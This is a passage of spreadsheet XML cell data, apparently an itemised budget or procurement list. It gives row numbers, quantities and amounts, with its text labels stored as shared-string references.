    <row r="229" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A229" s="25"/>
      <c r="B229" s="36">
        <v>355</v>
      </c>
      <c r="C229" s="36"/>
      <c r="D229" s="63" t="s">
        <v>4578</v>
      </c>
      <c r="E229" s="63" t="s">
        <v>4381</v>
      </c>
      <c r="F229" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G229" s="26">
        <v>1</v>
      </c>
      <c r="H229" s="26"/>
      <c r="I229" s="26"/>
      <c r="J229" s="50">
        <v>22400</v>
      </c>
      <c r="L229" s="25"/>
      <c r="M229" s="25"/>
      <c r="N229" s="47"/>
      <c r="O229" s="47"/>
      <c r="P229" s="47"/>
      <c r="Q229" s="47"/>
      <c r="R229" s="47"/>
      <c r="S229" s="47"/>
      <c r="T229" s="47"/>
      <c r="U229" s="47"/>
      <c r="V229" s="47"/>
      <c r="W229" s="47"/>
      <c r="X229" s="47"/>
      <c r="Y229" s="47"/>
      <c r="Z229" s="47"/>
      <c r="AA229" s="47"/>
      <c r="AB229" s="47"/>
      <c r="AC229" s="47"/>
      <c r="AD229" s="47"/>
      <c r="AE229" s="47"/>
      <c r="AF229" s="47"/>
      <c r="AG229" s="47"/>
    </row>
    <row r="230" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A230" s="25"/>
      <c r="B230" s="36">
        <v>356</v>
      </c>
      <c r="C230" s="36"/>
      <c r="D230" s="63" t="s">
        <v>4579</v>
      </c>
      <c r="E230" s="63" t="s">
        <v>4381</v>
      </c>
      <c r="F230" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G230" s="26">
        <v>1</v>
      </c>
      <c r="H230" s="26"/>
      <c r="I230" s="26"/>
      <c r="J230" s="50">
        <v>16000</v>
      </c>
      <c r="L230" s="25"/>
      <c r="M230" s="25"/>
      <c r="N230" s="47"/>
      <c r="O230" s="47"/>
      <c r="P230" s="47"/>
      <c r="Q230" s="47"/>
      <c r="R230" s="47"/>
      <c r="S230" s="47"/>
      <c r="T230" s="47"/>
      <c r="U230" s="47"/>
      <c r="V230" s="47"/>
      <c r="W230" s="47"/>
      <c r="X230" s="47"/>
      <c r="Y230" s="47"/>
      <c r="Z230" s="47"/>
      <c r="AA230" s="47"/>
      <c r="AB230" s="47"/>
      <c r="AC230" s="47"/>
      <c r="AD230" s="47"/>
      <c r="AE230" s="47"/>
      <c r="AF230" s="47"/>
      <c r="AG230" s="47"/>
    </row>
    <row r="231" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A231" s="25"/>
      <c r="B231" s="36">
        <v>357</v>
      </c>
      <c r="C231" s="36"/>
      <c r="D231" s="63" t="s">
        <v>4565</v>
      </c>
      <c r="E231" s="63" t="s">
        <v>4580</v>
      </c>
      <c r="F231" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G231" s="26">
        <v>1</v>
      </c>
      <c r="H231" s="26"/>
      <c r="I231" s="26"/>
      <c r="J231" s="50">
        <v>1600</v>
      </c>
      <c r="L231" s="25"/>
      <c r="M231" s="25"/>
      <c r="N231" s="47"/>
      <c r="O231" s="47"/>
      <c r="P231" s="47"/>
      <c r="Q231" s="47"/>
      <c r="R231" s="47"/>
      <c r="S231" s="47"/>
      <c r="T231" s="47"/>
      <c r="U231" s="47"/>
      <c r="V231" s="47"/>
      <c r="W231" s="47"/>
      <c r="X231" s="47"/>
      <c r="Y231" s="47"/>
      <c r="Z231" s="47"/>
      <c r="AA231" s="47"/>
      <c r="AB231" s="47"/>
      <c r="AC231" s="47"/>
      <c r="AD231" s="47"/>
      <c r="AE231" s="47"/>
      <c r="AF231" s="47"/>
      <c r="AG231" s="47"/>
    </row>
    <row r="232" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A232" s="25"/>
      <c r="B232" s="36">
        <v>358</v>
      </c>
      <c r="C232" s="36"/>
      <c r="D232" s="63" t="s">
        <v>2430</v>
      </c>
      <c r="E232" s="63" t="s">
        <v>4581</v>
      </c>
      <c r="F232" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G232" s="26">
        <v>1</v>
      </c>
      <c r="H232" s="26"/>
      <c r="I232" s="26"/>
      <c r="J232" s="50">
        <v>2400</v>
      </c>
      <c r="L232" s="25"/>
      <c r="M232" s="25"/>
      <c r="N232" s="47"/>
      <c r="O232" s="47"/>
      <c r="P232" s="47"/>
      <c r="Q232" s="47"/>
      <c r="R232" s="47"/>
      <c r="S232" s="47"/>
      <c r="T232" s="47"/>
      <c r="U232" s="47"/>
      <c r="V232" s="47"/>
      <c r="W232" s="47"/>
      <c r="X232" s="47"/>
      <c r="Y232" s="47"/>
      <c r="Z232" s="47"/>
      <c r="AA232" s="47"/>
      <c r="AB232" s="47"/>
      <c r="AC232" s="47"/>
      <c r="AD232" s="47"/>
      <c r="AE232" s="47"/>
      <c r="AF232" s="47"/>
      <c r="AG232" s="47"/>
    </row>
    <row r="233" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A233" s="25"/>
      <c r="B233" s="36">
        <v>359</v>
      </c>
      <c r="C233" s="36"/>
      <c r="D233" s="63" t="s">
        <v>4582</v>
      </c>
      <c r="E233" s="63" t="s">
        <v>4583</v>
      </c>
      <c r="F233" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G233" s="26">
        <v>1</v>
      </c>
      <c r="H233" s="26"/>
      <c r="I233" s="26"/>
      <c r="J233" s="50">
        <v>2800</v>
      </c>
      <c r="K233" s="26"/>
      <c r="L233" s="25"/>
      <c r="M233" s="25"/>
      <c r="N233" s="47"/>
      <c r="O233" s="47"/>
      <c r="P233" s="47"/>
      <c r="Q233" s="47"/>
      <c r="R233" s="47"/>
      <c r="S233" s="47"/>
      <c r="T233" s="47"/>
      <c r="U233" s="47"/>
      <c r="V233" s="47"/>
      <c r="W233" s="47"/>
      <c r="X233" s="47"/>
      <c r="Y233" s="47"/>
      <c r="Z233" s="47"/>
      <c r="AA233" s="47"/>
      <c r="AB233" s="47"/>
      <c r="AC233" s="47"/>
      <c r="AD233" s="47"/>
      <c r="AE233" s="47"/>
      <c r="AF233" s="47"/>
      <c r="AG233" s="47"/>
    </row>
    <row r="234" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A234" s="25"/>
      <c r="B234" s="36">
        <v>360</v>
      </c>
      <c r="C234" s="36"/>
      <c r="D234" s="63" t="s">
        <v>4223</v>
      </c>
      <c r="E234" s="63"/>
      <c r="F234" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G234" s="26">
        <v>5</v>
      </c>
      <c r="H234" s="26"/>
      <c r="I234" s="26"/>
      <c r="J234" s="50">
        <v>8000</v>
      </c>
      <c r="K234" s="26" t="s">
        <v>4584</v>
      </c>
      <c r="L234" s="25"/>
      <c r="M234" s="25"/>
      <c r="N234" s="47"/>
      <c r="O234" s="47"/>
      <c r="P234" s="47"/>
      <c r="Q234" s="47"/>
      <c r="R234" s="47"/>
      <c r="S234" s="47"/>
      <c r="T234" s="47"/>
      <c r="U234" s="47"/>
      <c r="V234" s="47"/>
      <c r="W234" s="47"/>
      <c r="X234" s="47"/>
      <c r="Y234" s="47"/>
      <c r="Z234" s="47"/>
      <c r="AA234" s="47"/>
      <c r="AB234" s="47"/>
      <c r="AC234" s="47"/>
      <c r="AD234" s="47"/>
      <c r="AE234" s="47"/>
      <c r="AF234" s="47"/>
      <c r="AG234" s="47"/>
    </row>
    <row r="235" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A235" s="25"/>
      <c r="B235" s="74" t="s">
        <v>1927</v>
      </c>
      <c r="C235" s="74"/>
      <c r="D235" s="74"/>
      <c r="E235" s="74"/>
      <c r="F235" s="36"/>
      <c r="G235" s="26"/>
      <c r="H235" s="26"/>
      <c r="I235" s="26"/>
      <c r="J235" s="50">
        <v>0</v>
      </c>
      <c r="K235" s="26"/>
      <c r="L235" s="25"/>
      <c r="M235" s="25"/>
      <c r="N235" s="47"/>
      <c r="O235" s="47"/>
      <c r="P235" s="47"/>
      <c r="Q235" s="47"/>
      <c r="R235" s="47"/>
      <c r="S235" s="47"/>
      <c r="T235" s="47"/>
      <c r="U235" s="47"/>
      <c r="V235" s="47"/>
      <c r="W235" s="47"/>
      <c r="X235" s="47"/>
      <c r="Y235" s="47"/>
      <c r="Z235" s="47"/>
      <c r="AA235" s="47"/>
      <c r="AB235" s="47"/>
      <c r="AC235" s="47"/>
      <c r="AD235" s="47"/>
      <c r="AE235" s="47"/>
      <c r="AF235" s="47"/>
      <c r="AG235" s="47"/>
    </row>
    <row r="236" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A236" s="25"/>
      <c r="B236" s="36">
        <v>362</v>
      </c>
      <c r="C236" s="36"/>
      <c r="D236" s="66" t="s">
        <v>4585</v>
      </c>
      <c r="E236" s="66" t="s">
        <v>4586</v>
      </c>
      <c r="F236" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G236" s="23">
        <v>1</v>
      </c>
      <c r="H236" s="36"/>
      <c r="I236" s="76"/>
      <c r="J236" s="50">
        <v>9600</v>
      </c>
      <c r="K236" s="26"/>
      <c r="L236" s="25"/>
      <c r="M236" s="25"/>
      <c r="N236" s="47"/>
      <c r="O236" s="47"/>
      <c r="P236" s="47"/>
      <c r="Q236" s="47"/>
      <c r="R236" s="47"/>
      <c r="S236" s="47"/>
      <c r="T236" s="47"/>
      <c r="U236" s="47"/>
      <c r="V236" s="47"/>
      <c r="W236" s="47"/>
      <c r="X236" s="47"/>
      <c r="Y236" s="47"/>
      <c r="Z236" s="47"/>
      <c r="AA236" s="47"/>
      <c r="AB236" s="47"/>
      <c r="AC236" s="47"/>
      <c r="AD236" s="47"/>
      <c r="AE236" s="47"/>
      <c r="AF236" s="47"/>
      <c r="AG236" s="47"/>
    </row>
    <row r="237" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A237" s="25"/>
      <c r="B237" s="36">
        <v>363</v>
      </c>
      <c r="C237" s="36"/>
      <c r="D237" s="63" t="s">
        <v>4587</v>
      </c>
      <c r="E237" s="63" t="s">
        <v>4381</v>
      </c>
      <c r="F237" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G237" s="26">
        <v>1</v>
      </c>
      <c r="H237" s="26"/>
      <c r="I237" s="75"/>
      <c r="J237" s="50">
        <v>12000</v>
      </c>
      <c r="L237" s="25"/>
      <c r="M237" s="25"/>
      <c r="N237" s="47"/>
      <c r="O237" s="47"/>
      <c r="P237" s="47"/>
      <c r="Q237" s="47"/>
      <c r="R237" s="47"/>
      <c r="S237" s="47"/>
      <c r="T237" s="47"/>
      <c r="U237" s="47"/>
      <c r="V237" s="47"/>
      <c r="W237" s="47"/>
      <c r="X237" s="47"/>
      <c r="Y237" s="47"/>
      <c r="Z237" s="47"/>
      <c r="AA237" s="47"/>
      <c r="AB237" s="47"/>
      <c r="AC237" s="47"/>
      <c r="AD237" s="47"/>
      <c r="AE237" s="47"/>
      <c r="AF237" s="47"/>
      <c r="AG237" s="47"/>
    </row>
    <row r="238" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A238" s="25"/>
      <c r="B238" s="36">
        <v>364</v>
      </c>
      <c r="C238" s="36"/>
      <c r="D238" s="63" t="s">
        <v>1092</v>
      </c>
      <c r="E238" s="63" t="s">
        <v>4588</v>
      </c>
      <c r="F238" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G238" s="26">
        <v>1</v>
      </c>
      <c r="H238" s="26"/>
      <c r="I238" s="75"/>
      <c r="J238" s="50">
        <v>1440</v>
      </c>
      <c r="L238" s="25"/>
      <c r="M238" s="25"/>
      <c r="N238" s="47"/>
      <c r="O238" s="47"/>
      <c r="P238" s="47"/>
      <c r="Q238" s="47"/>
      <c r="R238" s="47"/>
      <c r="S238" s="47"/>
      <c r="T238" s="47"/>
      <c r="U238" s="47"/>
      <c r="V238" s="47"/>
      <c r="W238" s="47"/>
      <c r="X238" s="47"/>
      <c r="Y238" s="47"/>
      <c r="Z238" s="47"/>
      <c r="AA238" s="47"/>
      <c r="AB238" s="47"/>
      <c r="AC238" s="47"/>
      <c r="AD238" s="47"/>
      <c r="AE238" s="47"/>
      <c r="AF238" s="47"/>
      <c r="AG238" s="47"/>
    </row>
    <row r="239" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A239" s="25"/>
      <c r="B239" s="74" t="s">
        <v>4589</v>
      </c>
      <c r="C239" s="74"/>
      <c r="D239" s="74"/>
      <c r="E239" s="74"/>
      <c r="F239" s="36"/>
      <c r="G239" s="26"/>
      <c r="H239" s="26"/>
      <c r="I239" s="26"/>
      <c r="J239" s="50">
        <v>0</v>
      </c>
      <c r="L239" s="25"/>
      <c r="M239" s="25"/>
      <c r="N239" s="47"/>
      <c r="O239" s="47"/>
      <c r="P239" s="47"/>
      <c r="Q239" s="47"/>
      <c r="R239" s="47"/>
      <c r="S239" s="47"/>
      <c r="T239" s="47"/>
      <c r="U239" s="47"/>
      <c r="V239" s="47"/>
      <c r="W239" s="47"/>
      <c r="X239" s="47"/>
      <c r="Y239" s="47"/>
      <c r="Z239" s="47"/>
      <c r="AA239" s="47"/>
      <c r="AB239" s="47"/>
      <c r="AC239" s="47"/>
      <c r="AD239" s="47"/>
      <c r="AE239" s="47"/>
      <c r="AF239" s="47"/>
      <c r="AG239" s="47"/>
    </row>
    <row r="240" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A240" s="25"/>
      <c r="B240" s="36">
        <v>365</v>
      </c>
      <c r="C240" s="36"/>
      <c r="D240" s="63" t="s">
        <v>4590</v>
      </c>
      <c r="E240" s="63" t="s">
        <v>4534</v>
      </c>
      <c r="F240" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G240" s="26">
        <v>1</v>
      </c>
      <c r="H240" s="26"/>
      <c r="I240" s="26"/>
      <c r="J240" s="50">
        <v>960</v>
      </c>
      <c r="L240" s="25"/>
      <c r="M240" s="25"/>
      <c r="N240" s="47"/>
      <c r="O240" s="47"/>
      <c r="P240" s="47"/>
      <c r="Q240" s="47"/>
      <c r="R240" s="47"/>
      <c r="S240" s="47"/>
      <c r="T240" s="47"/>
      <c r="U240" s="47"/>
      <c r="V240" s="47"/>
      <c r="W240" s="47"/>
      <c r="X240" s="47"/>
      <c r="Y240" s="47"/>
      <c r="Z240" s="47"/>
      <c r="AA240" s="47"/>
      <c r="AB240" s="47"/>
      <c r="AC240" s="47"/>
      <c r="AD240" s="47"/>
      <c r="AE240" s="47"/>
      <c r="AF240" s="47"/>
      <c r="AG240" s="47"/>
    </row>
    <row r="241" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A241" s="25"/>
      <c r="B241" s="36">
        <v>366</v>
      </c>
      <c r="C241" s="36"/>
      <c r="D241" s="63" t="s">
        <v>4591</v>
      </c>
      <c r="E241" s="63" t="s">
        <v>4592</v>
      </c>
      <c r="F241" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G241" s="26">
        <v>1</v>
      </c>
      <c r="H241" s="26"/>
      <c r="I241" s="26"/>
      <c r="J241" s="50">
        <v>2000</v>
      </c>
      <c r="L241" s="25"/>
      <c r="M241" s="25"/>
      <c r="N241" s="47"/>
      <c r="O241" s="47"/>
      <c r="P241" s="47"/>
      <c r="Q241" s="47"/>
      <c r="R241" s="47"/>
      <c r="S241" s="47"/>
      <c r="T241" s="47"/>
      <c r="U241" s="47"/>
      <c r="V241" s="47"/>
      <c r="W241" s="47"/>
      <c r="X241" s="47"/>
      <c r="Y241" s="47"/>
      <c r="Z241" s="47"/>
      <c r="AA241" s="47"/>
      <c r="AB241" s="47"/>
      <c r="AC241" s="47"/>
      <c r="AD241" s="47"/>
      <c r="AE241" s="47"/>
      <c r="AF241" s="47"/>
      <c r="AG241" s="47"/>
    </row>
    <row r="242" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A242" s="25"/>
      <c r="B242" s="36">
        <v>367</v>
      </c>
      <c r="C242" s="36"/>
      <c r="D242" s="63" t="s">
        <v>4593</v>
      </c>
      <c r="E242" s="63"/>
      <c r="F242" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G242" s="26">
        <v>1</v>
      </c>
      <c r="H242" s="26"/>
      <c r="I242" s="26"/>
      <c r="J242" s="50">
        <v>240</v>
      </c>
      <c r="L242" s="25"/>
      <c r="M242" s="25"/>
      <c r="N242" s="47"/>
      <c r="O242" s="47"/>
      <c r="P242" s="47"/>
      <c r="Q242" s="47"/>
      <c r="R242" s="47"/>
      <c r="S242" s="47"/>
      <c r="T242" s="47"/>
      <c r="U242" s="47"/>
      <c r="V242" s="47"/>
      <c r="W242" s="47"/>
      <c r="X242" s="47"/>
      <c r="Y242" s="47"/>
      <c r="Z242" s="47"/>
      <c r="AA242" s="47"/>
      <c r="AB242" s="47"/>
      <c r="AC242" s="47"/>
      <c r="AD242" s="47"/>
      <c r="AE242" s="47"/>
      <c r="AF242" s="47"/>
      <c r="AG242" s="47"/>
    </row>
    <row r="243" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A243" s="25"/>
      <c r="B243" s="36">
        <v>368</v>
      </c>
      <c r="C243" s="36"/>
      <c r="D243" s="63" t="s">
        <v>1313</v>
      </c>
      <c r="E243" s="63" t="s">
        <v>4594</v>
      </c>
      <c r="F243" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G243" s="26">
        <v>1</v>
      </c>
      <c r="H243" s="26"/>
      <c r="I243" s="26"/>
      <c r="J243" s="50">
        <v>8000</v>
      </c>
      <c r="L243" s="25"/>
      <c r="M243" s="25"/>
      <c r="N243" s="47"/>
      <c r="O243" s="47"/>
      <c r="P243" s="47"/>
      <c r="Q243" s="47"/>
      <c r="R243" s="47"/>
      <c r="S243" s="47"/>
      <c r="T243" s="47"/>
      <c r="U243" s="47"/>
      <c r="V243" s="47"/>
      <c r="W243" s="47"/>
      <c r="X243" s="47"/>
      <c r="Y243" s="47"/>
      <c r="Z243" s="47"/>
      <c r="AA243" s="47"/>
      <c r="AB243" s="47"/>
      <c r="AC243" s="47"/>
      <c r="AD243" s="47"/>
      <c r="AE243" s="47"/>
      <c r="AF243" s="47"/>
      <c r="AG243" s="47"/>
    </row>
    <row r="244" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A244" s="25"/>
      <c r="B244" s="74" t="s">
        <v>1799</v>
      </c>
      <c r="C244" s="74"/>
      <c r="D244" s="74"/>
      <c r="E244" s="74"/>
      <c r="F244" s="36"/>
      <c r="G244" s="26"/>
      <c r="H244" s="26"/>
      <c r="I244" s="26"/>
      <c r="J244" s="50">
        <v>0</v>
      </c>
      <c r="K244" s="26"/>
      <c r="L244" s="25"/>
      <c r="M244" s="25"/>
      <c r="N244" s="47"/>
      <c r="O244" s="47"/>
      <c r="P244" s="47"/>
      <c r="Q244" s="47"/>
      <c r="R244" s="47"/>
      <c r="S244" s="47"/>
      <c r="T244" s="47"/>
      <c r="U244" s="47"/>
      <c r="V244" s="47"/>
      <c r="W244" s="47"/>
      <c r="X244" s="47"/>
      <c r="Y244" s="47"/>
      <c r="Z244" s="47"/>
      <c r="AA244" s="47"/>
      <c r="AB244" s="47"/>
      <c r="AC244" s="47"/>
      <c r="AD244" s="47"/>
      <c r="AE244" s="47"/>
      <c r="AF244" s="47"/>
      <c r="AG244" s="47"/>
    </row>
    <row r="245" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A245" s="25"/>
      <c r="B245" s="36">
        <v>369</v>
      </c>
      <c r="C245" s="36"/>
      <c r="D245" s="63" t="s">
        <v>1324</v>
      </c>
      <c r="E245" s="63" t="s">
        <v>494</v>
      </c>
      <c r="F245" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G245" s="26">
        <v>1</v>
      </c>
      <c r="H245" s="26"/>
      <c r="I245" s="26"/>
      <c r="J245" s="50">
        <v>960</v>
      </c>
      <c r="K245" s="26"/>
      <c r="L245" s="25"/>
      <c r="M245" s="25"/>
      <c r="N245" s="47"/>
      <c r="O245" s="47"/>
      <c r="P245" s="47"/>
      <c r="Q245" s="47"/>
      <c r="R245" s="47"/>
      <c r="S245" s="47"/>
      <c r="T245" s="47"/>
      <c r="U245" s="47"/>
      <c r="V245" s="47"/>
      <c r="W245" s="47"/>
      <c r="X245" s="47"/>
      <c r="Y245" s="47"/>
      <c r="Z245" s="47"/>
      <c r="AA245" s="47"/>
      <c r="AB245" s="47"/>
      <c r="AC245" s="47"/>
      <c r="AD245" s="47"/>
      <c r="AE245" s="47"/>
      <c r="AF245" s="47"/>
      <c r="AG245" s="47"/>
    </row>
    <row r="246" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A246" s="25"/>
      <c r="B246" s="36">
        <v>370</v>
      </c>
      <c r="C246" s="36"/>
      <c r="D246" s="63" t="s">
        <v>4595</v>
      </c>
      <c r="E246" s="63" t="s">
        <v>4596</v>
      </c>
      <c r="F246" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G246" s="26">
        <v>1</v>
      </c>
      <c r="H246" s="26"/>
      <c r="I246" s="26"/>
      <c r="J246" s="50">
        <v>78400</v>
      </c>
      <c r="K246" s="26"/>
      <c r="L246" s="25"/>
      <c r="M246" s="25"/>
      <c r="N246" s="47"/>
      <c r="O246" s="47"/>
      <c r="P246" s="47"/>
      <c r="Q246" s="47"/>
      <c r="R246" s="47"/>
      <c r="S246" s="47"/>
      <c r="T246" s="47"/>
      <c r="U246" s="47"/>
      <c r="V246" s="47"/>
      <c r="W246" s="47"/>
      <c r="X246" s="47"/>
      <c r="Y246" s="47"/>
      <c r="Z246" s="47"/>
      <c r="AA246" s="47"/>
      <c r="AB246" s="47"/>
      <c r="AC246" s="47"/>
      <c r="AD246" s="47"/>
      <c r="AE246" s="47"/>
      <c r="AF246" s="47"/>
      <c r="AG246" s="47"/>
    </row>
    <row r="247" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A247" s="25"/>
      <c r="B247" s="36">
        <v>371</v>
      </c>
      <c r="C247" s="36"/>
      <c r="D247" s="63" t="s">
        <v>4597</v>
      </c>
      <c r="E247" s="63" t="s">
        <v>4598</v>
      </c>
      <c r="F247" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G247" s="26">
        <v>1</v>
      </c>
      <c r="H247" s="26"/>
      <c r="I247" s="75"/>
      <c r="J247" s="50">
        <v>480</v>
      </c>
      <c r="L247" s="25"/>
      <c r="M247" s="25"/>
      <c r="N247" s="47"/>
      <c r="O247" s="47"/>
      <c r="P247" s="47"/>
      <c r="Q247" s="47"/>
      <c r="R247" s="47"/>
      <c r="S247" s="47"/>
      <c r="T247" s="47"/>
      <c r="U247" s="47"/>
      <c r="V247" s="47"/>
      <c r="W247" s="47"/>
      <c r="X247" s="47"/>
      <c r="Y247" s="47"/>
      <c r="Z247" s="47"/>
      <c r="AA247" s="47"/>
      <c r="AB247" s="47"/>
      <c r="AC247" s="47"/>
      <c r="AD247" s="47"/>
      <c r="AE247" s="47"/>
      <c r="AF247" s="47"/>
      <c r="AG247" s="47"/>
    </row>
    <row r="248" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A248" s="25"/>
      <c r="B248" s="36">
        <v>372</v>
      </c>
      <c r="C248" s="36"/>
      <c r="D248" s="63" t="s">
        <v>334</v>
      </c>
      <c r="E248" s="63" t="s">
        <v>1288</v>
      </c>
      <c r="F248" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G248" s="26">
        <v>1</v>
      </c>
      <c r="H248" s="26"/>
      <c r="I248" s="75"/>
      <c r="J248" s="50">
        <v>5600</v>
      </c>
      <c r="L248" s="25"/>
      <c r="M248" s="25"/>
      <c r="N248" s="47"/>
      <c r="O248" s="47"/>
      <c r="P248" s="47"/>
      <c r="Q248" s="47"/>
      <c r="R248" s="47"/>
      <c r="S248" s="47"/>
      <c r="T248" s="47"/>
      <c r="U248" s="47"/>
      <c r="V248" s="47"/>
      <c r="W248" s="47"/>
      <c r="X248" s="47"/>
      <c r="Y248" s="47"/>
      <c r="Z248" s="47"/>
      <c r="AA248" s="47"/>
      <c r="AB248" s="47"/>
      <c r="AC248" s="47"/>
      <c r="AD248" s="47"/>
      <c r="AE248" s="47"/>
      <c r="AF248" s="47"/>
      <c r="AG248" s="47"/>
    </row>
    <row r="249" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A249" s="25"/>
      <c r="B249" s="36">
        <v>373</v>
      </c>
      <c r="C249" s="36"/>
      <c r="D249" s="63" t="s">
        <v>1293</v>
      </c>
      <c r="E249" s="63"/>
      <c r="F249" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G249" s="26">
        <v>1</v>
      </c>
      <c r="H249" s="26"/>
      <c r="I249" s="26"/>
      <c r="J249" s="50">
        <v>1760</v>
      </c>
      <c r="L249" s="25"/>
      <c r="M249" s="25"/>
      <c r="N249" s="47"/>
      <c r="O249" s="47"/>
      <c r="P249" s="47"/>
      <c r="Q249" s="47"/>
      <c r="R249" s="47"/>
      <c r="S249" s="47"/>
      <c r="T249" s="47"/>
      <c r="U249" s="47"/>
      <c r="V249" s="47"/>
      <c r="W249" s="47"/>
      <c r="X249" s="47"/>
      <c r="Y249" s="47"/>
      <c r="Z249" s="47"/>
      <c r="AA249" s="47"/>
      <c r="AB249" s="47"/>
      <c r="AC249" s="47"/>
      <c r="AD249" s="47"/>
      <c r="AE249" s="47"/>
      <c r="AF249" s="47"/>
      <c r="AG249" s="47"/>
    </row>
    <row r="250" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A250" s="25"/>
      <c r="B250" s="36">
        <v>374</v>
      </c>
      <c r="C250" s="36"/>
      <c r="D250" s="63" t="s">
        <v>3228</v>
      </c>
      <c r="E250" s="63" t="s">
        <v>4269</v>
      </c>
      <c r="F250" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G250" s="26">
        <v>1</v>
      </c>
      <c r="H250" s="26"/>
      <c r="I250" s="26"/>
      <c r="J250" s="50">
        <v>48000</v>
      </c>
      <c r="L250" s="25"/>
      <c r="M250" s="25"/>
      <c r="N250" s="47"/>
      <c r="O250" s="47"/>
      <c r="P250" s="47"/>
      <c r="Q250" s="47"/>
      <c r="R250" s="47"/>
      <c r="S250" s="47"/>
      <c r="T250" s="47"/>
      <c r="U250" s="47"/>
      <c r="V250" s="47"/>
      <c r="W250" s="47"/>
      <c r="X250" s="47"/>
      <c r="Y250" s="47"/>
      <c r="Z250" s="47"/>
      <c r="AA250" s="47"/>
      <c r="AB250" s="47"/>
      <c r="AC250" s="47"/>
      <c r="AD250" s="47"/>
      <c r="AE250" s="47"/>
      <c r="AF250" s="47"/>
      <c r="AG250" s="47"/>
    </row>
    <row r="251" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A251" s="25"/>
      <c r="B251" s="36">
        <v>375</v>
      </c>
      <c r="C251" s="36"/>
      <c r="D251" s="63" t="s">
        <v>3899</v>
      </c>
      <c r="E251" s="63" t="s">
        <v>4599</v>
      </c>
      <c r="F251" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G251" s="26">
        <v>1</v>
      </c>
      <c r="H251" s="26"/>
      <c r="I251" s="26"/>
      <c r="J251" s="50">
        <v>9600</v>
      </c>
      <c r="L251" s="25"/>
      <c r="M251" s="25"/>
      <c r="N251" s="47"/>
      <c r="O251" s="47"/>
      <c r="P251" s="47"/>
      <c r="Q251" s="47"/>
      <c r="R251" s="47"/>
      <c r="S251" s="47"/>
      <c r="T251" s="47"/>
      <c r="U251" s="47"/>
      <c r="V251" s="47"/>
      <c r="W251" s="47"/>
      <c r="X251" s="47"/>
      <c r="Y251" s="47"/>
      <c r="Z251" s="47"/>
      <c r="AA251" s="47"/>
      <c r="AB251" s="47"/>
      <c r="AC251" s="47"/>
      <c r="AD251" s="47"/>
      <c r="AE251" s="47"/>
      <c r="AF251" s="47"/>
      <c r="AG251" s="47"/>
    </row>
    <row r="252" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A252" s="25"/>
      <c r="B252" s="36">
        <v>376</v>
      </c>
      <c r="C252" s="36"/>
      <c r="D252" s="63" t="s">
        <v>3382</v>
      </c>
      <c r="E252" s="63" t="s">
        <v>4600</v>
      </c>
      <c r="F252" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G252" s="26">
        <v>1</v>
      </c>
      <c r="H252" s="26"/>
      <c r="I252" s="26"/>
      <c r="J252" s="50">
        <v>48000</v>
      </c>
      <c r="L252" s="25"/>
      <c r="M252" s="25"/>
      <c r="N252" s="47"/>
      <c r="O252" s="47"/>
      <c r="P252" s="47"/>
      <c r="Q252" s="47"/>
      <c r="R252" s="47"/>
      <c r="S252" s="47"/>
      <c r="T252" s="47"/>
      <c r="U252" s="47"/>
      <c r="V252" s="47"/>
      <c r="W252" s="47"/>
      <c r="X252" s="47"/>
      <c r="Y252" s="47"/>
      <c r="Z252" s="47"/>
      <c r="AA252" s="47"/>
      <c r="AB252" s="47"/>
      <c r="AC252" s="47"/>
      <c r="AD252" s="47"/>
      <c r="AE252" s="47"/>
      <c r="AF252" s="47"/>
      <c r="AG252" s="47"/>
    </row>
    <row r="253" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A253" s="25"/>
      <c r="B253" s="36">
        <v>377</v>
      </c>
      <c r="C253" s="36"/>
      <c r="D253" s="63" t="s">
        <v>1110</v>
      </c>
      <c r="E253" s="63" t="s">
        <v>4601</v>
      </c>
      <c r="F253" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G253" s="26">
        <v>1</v>
      </c>
      <c r="H253" s="26"/>
      <c r="I253" s="26"/>
      <c r="J253" s="50">
        <v>800</v>
      </c>
      <c r="L253" s="25"/>
      <c r="M253" s="25"/>
      <c r="N253" s="47"/>
      <c r="O253" s="47"/>
      <c r="P253" s="47"/>
